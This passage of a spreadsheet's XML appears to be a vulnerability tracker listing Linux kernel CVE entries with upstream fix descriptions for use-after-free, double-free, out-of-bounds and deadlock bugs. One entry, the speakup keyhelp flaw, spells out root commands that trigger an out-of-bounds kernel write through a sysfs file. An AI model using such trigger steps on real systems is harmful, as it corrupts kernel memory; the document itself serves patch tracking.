allocate_partition() underflows (parent_size - 0xFFFFFFFFFFFFFFFD
= parent_size + 3). If the underflow result does not appear to
leave enough space, allocate_partition() jumps to out_register via
goto, skipping erasesize initialization. This results in
erasesize=0, which triggers:
WARN_ON((!mtd-&gt;erasesize || !master-&gt;_erase) &amp;&amp;
		!(mtd-&gt;flags &amp; MTD_NO_ERASE))
in add_mtd_device(). If the underflow result appears to leave
enough space, a bogus partition size is calculated, but the
"out of reach" sanity check catches the invalid offset and
creates a disabled empty partition (offset=0, size=0) instead
of returning an error.
Fix this by adding MTDPART_OFS_RETAIN to the rejection list in
mtd_add_partition(), consistent with the existing handling of
APPEND and NXTBLK.</t>
        </is>
      </c>
      <c r="T866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93048</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93049</t>
        </is>
      </c>
      <c r="D867" s="5" t="inlineStr"/>
      <c r="E867" s="5" t="inlineStr"/>
      <c r="F867" s="5" t="inlineStr"/>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="inlineStr"/>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr"/>
      <c r="K867" s="5" t="inlineStr"/>
      <c r="L867" s="5" t="inlineStr"/>
      <c r="M867" s="5" t="inlineStr"/>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P867" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q867" s="5" t="inlineStr"/>
      <c r="R867" s="5" t="inlineStr"/>
      <c r="S867" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: mtdswap: Avoid freeing registered blktrans device twice
In mtdswap_add_mtd(), debugfs setup failure after successful blktrans
registration can free mbd_dev twice.
add_mtd_blktrans_dev() initializes the blktrans device reference and
publishes the disk. Once that succeeds, del_mtd_blktrans_dev() tears the
disk down and drops the blktrans reference; when that reference reaches
zero, blktrans_dev_release() frees the mtd_blktrans_dev.
The debugfs failure path called del_mtd_blktrans_dev(mbd_dev), then fell
through the common cleanup label and called kfree(mbd_dev) again. Clear
the local pointer after deregistration so the common cleanup can still
release the mtdswap state without freeing the blktrans object twice.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="T867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93049</t>
        </is>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B868" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93050</t>
        </is>
      </c>
      <c r="D868" s="5" t="inlineStr"/>
      <c r="E868" s="5" t="inlineStr"/>
      <c r="F868" s="5" t="inlineStr"/>
      <c r="G868" s="5" t="inlineStr"/>
      <c r="H868" s="5" t="inlineStr"/>
      <c r="I868" s="5" t="inlineStr"/>
      <c r="J868" s="5" t="inlineStr"/>
      <c r="K868" s="5" t="inlineStr"/>
      <c r="L868" s="5" t="inlineStr"/>
      <c r="M868" s="5" t="inlineStr"/>
      <c r="N868" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O868" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P868" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q868" s="5" t="inlineStr"/>
      <c r="R868" s="5" t="inlineStr"/>
      <c r="S868" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipack: ipoctal: fix UAF, null-ptr-deref, and use-after-free in cleanup on remove
Three issues arise when the device is removed while a tty session is
still active:
1. UAF of struct ipoctal: the remove callback frees ipoctal via
   kfree() while tty ops may still access it.  Fix by introducing
   kref-based lifetime management — kref is taken in install() when
   a tty is opened and released in cleanup() when the tty is finally
   destroyed; remove() uses kref_put() instead of kfree().
2. NULL dereference in ipoctal_write_tty(): __ipoctal_remove()
   frees xmit_buf via tty_port_free_xmit_buf() while a userspace
   process may still hold the tty fd and call write().  Fix by
   checking for NULL xmit_buf in ipoctal_write_tty().
3. UAF in ipoctal_cleanup(): ipack_put_carrier(ipoctal-&gt;dev)
   dereferences ipoctal-&gt;dev after the ipack_device has been freed
   by ipack_device_del().  Fix by caching ipoctal-&gt;carrier_owner
   during probe() and calling module_put() on the cached pointer
   directly in cleanup(), avoiding any access to ipoctal-&gt;dev.
Also introduce a "removed" flag in struct ipoctal, set at the start
of __ipoctal_remove(), and checked in every tty op that accesses
hardware resources (port_activate, write_tty, set_termios, hangup,
shutdown).  This prevents page faults when devm_ioremap() regions
are unmapped after remove() returns.</t>
        </is>
      </c>
      <c r="T868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93050</t>
        </is>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B869" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93051</t>
        </is>
      </c>
      <c r="D869" s="5" t="inlineStr"/>
      <c r="E869" s="5" t="inlineStr"/>
      <c r="F869" s="5" t="inlineStr"/>
      <c r="G869" s="5" t="inlineStr"/>
      <c r="H869" s="5" t="inlineStr"/>
      <c r="I869" s="5" t="inlineStr"/>
      <c r="J869" s="5" t="inlineStr"/>
      <c r="K869" s="5" t="inlineStr"/>
      <c r="L869" s="5" t="inlineStr"/>
      <c r="M869" s="5" t="inlineStr"/>
      <c r="N869" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O869" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P869" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q869" s="5" t="inlineStr"/>
      <c r="R869" s="5" t="inlineStr"/>
      <c r="S869" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: ad525x_dpot: use driver core groups for sysfs files
ad_dpot_probe() creates per-RDAC sysfs files manually and then
optionally creates the command sysfs group. This leaves probe responsible
for rolling back partial sysfs state and makes remove responsible for
matching every file that probe created.
Move the device attributes into driver core dev_groups for the I2C and
SPI drivers and use an is_visible() callback to expose only the
attributes supported by the probed device. With this shape, the driver
core creates the sysfs files only after probe succeeds and removes them
before the remove callback frees the driver data.</t>
        </is>
      </c>
      <c r="T869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93051</t>
        </is>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B870" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C870" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93052</t>
        </is>
      </c>
      <c r="D870" s="5" t="inlineStr"/>
      <c r="E870" s="5" t="inlineStr"/>
      <c r="F870" s="5" t="inlineStr"/>
      <c r="G870" s="5" t="inlineStr"/>
      <c r="H870" s="5" t="inlineStr"/>
      <c r="I870" s="5" t="inlineStr"/>
      <c r="J870" s="5" t="inlineStr"/>
      <c r="K870" s="5" t="inlineStr"/>
      <c r="L870" s="5" t="inlineStr"/>
      <c r="M870" s="5" t="inlineStr"/>
      <c r="N870" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O870" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P870" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q870" s="5" t="inlineStr"/>
      <c r="R870" s="5" t="inlineStr"/>
      <c r="S870" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: bcm-vk: Use acquire/release for msgq_inited
bcm_vk_sync_msgq() fills the message queue information and then sets
msgq_inited. Readers call bcm_vk_drv_access_ok() before accessing the
message queues and their cached queue information.
atomic_set()/atomic_read() do not order those accesses. A reader can see
msgq_inited set while still seeing stale queue information. Use release
when publishing the initialized queues and acquire when checking the gate.
Keep the clear in bcm_vk_blk_drv_access() as atomic_set(). It closes the
gate and does not publish queue state to readers.</t>
        </is>
      </c>
      <c r="T870" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93052</t>
        </is>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B871" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C871" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93053</t>
        </is>
      </c>
      <c r="D871" s="5" t="inlineStr"/>
      <c r="E871" s="5" t="inlineStr"/>
      <c r="F871" s="5" t="inlineStr"/>
      <c r="G871" s="5" t="inlineStr"/>
      <c r="H871" s="5" t="inlineStr"/>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr"/>
      <c r="L871" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q871" s="5" t="inlineStr"/>
      <c r="R871" s="5" t="inlineStr"/>
      <c r="S871" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
speakup: keyhelp: guard letter_offsets possible out-of-range indexing
help_init() builds letter_offsets[] by using the first byte of each
function name as an index via `(start &amp; 31) - 1`. If function_names are
overridden from sysfs (root) with a name starting outside [a–z], the
index underflows or exceeds the array, leading to OOB write.
Function names can be overridden with the following commands as root:
    modprobe speakup_soft
    echo "0 _bad" &gt; /sys/accessibility/speakup/i18n/function_names
    # then press Insert+2 on /dev/tty
This fix checks the first letter in help_init(), and if it is not in the
[a–z] range the function returns an error to the caller. Eventually this
error is propagated to drivers/accessibility/speakup/main.c:2217, which
causes a bleep sound.</t>
        </is>
      </c>
      <c r="T871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93053</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93054</t>
        </is>
      </c>
      <c r="D872" s="5" t="inlineStr"/>
      <c r="E872" s="5" t="inlineStr"/>
      <c r="F872" s="5" t="inlineStr"/>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="inlineStr"/>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr"/>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q872" s="5" t="inlineStr"/>
      <c r="R872" s="5" t="inlineStr"/>
      <c r="S872" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
uio: Fix stale info pointer in failed registration path
After device_add(), the UIO device is visible to userspace and /dev/uioX
can be opened. If a later setup step fails, __uio_register_device()
unwinds the device but leaves idev-&gt;info pointing at the caller-owned
struct uio_info.
That is unsafe when an opener races with the failed registration path.
The open file keeps a reference to the uio_device, while the caller sees
registration failure and may free its struct uio_info. Later file
operations can then follow idev-&gt;info and dereference freed memory.
Handle post-device_add() failures like unregister: remove UIO attributes
while the info pointer is still valid, then clear idev-&gt;info under
info_lock and wake existing waiters/async users before removing the
device and minor. This makes already-open file descriptors observe the
same "device gone" state as normal uio_unregister_device().</t>
        </is>
      </c>
      <c r="T872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93054</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93055</t>
        </is>
      </c>
      <c r="D873" s="5" t="inlineStr"/>
      <c r="E873" s="5" t="inlineStr"/>
      <c r="F873" s="5" t="inlineStr"/>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="inlineStr"/>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr"/>
      <c r="L873" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q873" s="5" t="inlineStr"/>
      <c r="R873" s="5" t="inlineStr"/>
      <c r="S873" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
UDF symlink pathComponent header OOB read
udf_symlink_filler() can enter udf_pc_to_char() with a partial pathComponent header.
Validate that enough input remains for a complete pathComponent header
before accessing it. Reject malformed symlink data that would otherwise
make udf_pc_to_char() perform an out-of-bounds read.</t>
        </is>
      </c>
      <c r="T873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93055</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93056</t>
        </is>
      </c>
      <c r="D874" s="5" t="inlineStr"/>
      <c r="E874" s="5" t="inlineStr"/>
      <c r="F874" s="5" t="inlineStr"/>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="inlineStr"/>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr"/>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q874" s="5" t="inlineStr"/>
      <c r="R874" s="5" t="inlineStr"/>
      <c r="S874" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_uac1_legacy: remove broken string configfs attributes
The UAC1_STR_ATTRIBUTE macro defines configfs show/store handlers for
the fn_play, fn_cap, and fn_cntl string options. The store function
contains an inverted null check on the kstrndup() return value.
This means every write attempt returns -ENOMEM on success and
dereferences a NULL pointer on allocation failure. The attributes
have been broken and unused for many years.
Remove the UAC1_STR_ATTRIBUTE macro and the three attributes it
generated. The internal defaults (FILE_PCM_PLAYBACK, FILE_PCM_CAPTURE,
FILE_CONTROL) set in f_audio_alloc_inst() are unaffected.</t>
        </is>
      </c>
      <c r="T874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93056</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93057</t>
        </is>
      </c>
      <c r="D875" s="5" t="inlineStr"/>
      <c r="E875" s="5" t="inlineStr"/>
      <c r="F875" s="5" t="inlineStr"/>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="inlineStr"/>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr"/>
      <c r="L875" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q875" s="5" t="inlineStr"/>
      <c r="R875" s="5" t="inlineStr"/>
      <c r="S875" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Avoid possible memory reclaim deadlock in TX EQTR context
TX EQTR may run while devfreq gear scaling has quiesced the UFS
tagset. In that context, functions ufshcd_tx_eqtr(), __ufshcd_tx_eqtr()
and ufs_qcom_get_rx_fom() allocate memory with GFP_KERNEL. If direct
reclaim is triggered, reclaim/writeback can depend on I/O to UFS
device. Because the queue is quiesced, this can cause deadlock.
Use memalloc_noio_save/restore() in ufshcd_tx_eqtr() to cover all
allocations in the TX EQTR call tree, including:
 - params-&gt;eqtr_record in ufshcd_tx_eqtr()
 - eqtr_data in __ufshcd_tx_eqtr()
 - params in ufs_qcom_get_rx_fom()
This is preferred over tagging individual call sites with GFP_NOIO, as it
automatically covers any future allocations added anywhere in the call tree
without requiring each caller to be aware of this constraint.
[mkp: fix label as suggested by Bart]</t>
        </is>
      </c>
      <c r="T875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93057</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93058</t>
        </is>
      </c>
      <c r="D876" s="5" t="inlineStr"/>
      <c r="E876" s="5" t="inlineStr"/>
      <c r="F876" s="5" t="inlineStr"/>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="inlineStr"/>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr"/>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q876" s="5" t="inlineStr"/>
      <c r="R876" s="5" t="inlineStr"/>
      <c r="S876" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Only fini scheduler after successful init
msm_ringbuffer_new() destroys a partially initialized ring through
msm_ringbuffer_destroy() when an allocation or scheduler setup step
fails.
If drm_sched_init() fails before it finishes initializing the scheduler,
the failure path still calls drm_sched_fini(). That teardown path assumes
the scheduler work items, lists, and workqueue state were initialized.
Track successful scheduler initialization and call drm_sched_fini() only
after drm_sched_init() returned 0.
This issue was found by a static analysis checker and confirmed by
manual source review.
Patchwork: https://patchwork.freedesktop.org/patch/738905/</t>
        </is>
      </c>
      <c r="T876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93058</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93059</t>
        </is>
      </c>
      <c r="D877" s="5" t="inlineStr"/>
      <c r="E877" s="5" t="inlineStr"/>
      <c r="F877" s="5" t="inlineStr"/>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="inlineStr"/>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr"/>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q877" s="5" t="inlineStr"/>
      <c r="R877" s="5" t="inlineStr"/>
      <c r="S877" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Fix task_struct reference leak in recover_worker
get_pid_task() increments the task reference count, but the
corresponding put_task_struct() was missing in the else branch,
leaking a reference on every GPU hang recovery.
Patchwork: https://patchwork.freedesktop.org/patch/730662/</t>
        </is>
      </c>
      <c r="T877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93059</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93060</t>
        </is>
      </c>
      <c r="D878" s="5" t="inlineStr"/>
      <c r="E878" s="5" t="inlineStr"/>
      <c r="F878" s="5" t="inlineStr"/>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="inlineStr"/>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q878" s="5" t="inlineStr"/>
      <c r="R878" s="5" t="inlineStr"/>
      <c r="S878" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm/adreno: fix use after free on error path in a6xx_gpu_init()
The a6xx_destroy() function frees "a6xx_gpu" and so "adreno_gpu" points
to freed memory.  Preserve the error code before freeing the memory to
avoid a use after free.
Patchwork: https://patchwork.freedesktop.org/patch/732275/</t>
        </is>
      </c>
      <c r="T878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93060</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93061</t>
        </is>
      </c>
      <c r="D879" s="5" t="inlineStr"/>
      <c r="E879" s="5" t="inlineStr"/>
      <c r="F879" s="5" t="inlineStr"/>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="inlineStr"/>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr"/>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q879" s="5" t="inlineStr"/>
      <c r="R879" s="5" t="inlineStr"/>
      <c r="S879" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
gpu: host1x: Avoid stack over-read in debug output helpers
host1x_debug_output() and host1x_debug_cont() used vsnprintf(), which
returns the length the formatted string would have reached with an
unbounded buffer. That return value was passed straight to o-&gt;fn as
the number of bytes to emit.
This could cause a read past end of the output buffer if a call to
host1x_debug_* produced a string longer than 256 bytes. This only
affected the debugfs files as the printk debug sink ignores the
number of bytes. In practice, this is very unlikely to occur.
Fix by switching to vscnprintf(), which returns the number of bytes
actually written.</t>
        </is>
      </c>
      <c r="T879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93061</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93062</t>
        </is>
      </c>
      <c r="D880" s="5" t="inlineStr"/>
      <c r="E880" s="5" t="inlineStr"/>
      <c r="F880" s="5" t="inlineStr"/>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="inlineStr"/>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr"/>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q880" s="5" t="inlineStr"/>
      <c r="R880" s="5" t="inlineStr"/>
      <c r="S880" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: guard against division by zero in iwl_dbg_tlv_alloc_fragments
Make sure we don't end-up with a num_frags = 0 situation.
For that, check that the required size is not 0 and put a checker on
num_frags as well.</t>
        </is>
      </c>
      <c r="T880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93062</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93063</t>
        </is>
      </c>
      <c r="D881" s="5" t="inlineStr"/>
      <c r="E881" s="5" t="inlineStr"/>
      <c r="F881" s="5" t="inlineStr"/>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="inlineStr"/>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K881" s="5" t="inlineStr"/>
      <c r="L881" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q881" s="5" t="inlineStr"/>
      <c r="R881" s="5" t="inlineStr"/>
      <c r="S881" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: mei: check SAP message length before reading it
Verify the SAP message size is not larger than the local buffer before
reading the message to avoid buffer overflow.</t>
        </is>
      </c>
      <c r="T881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93063</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
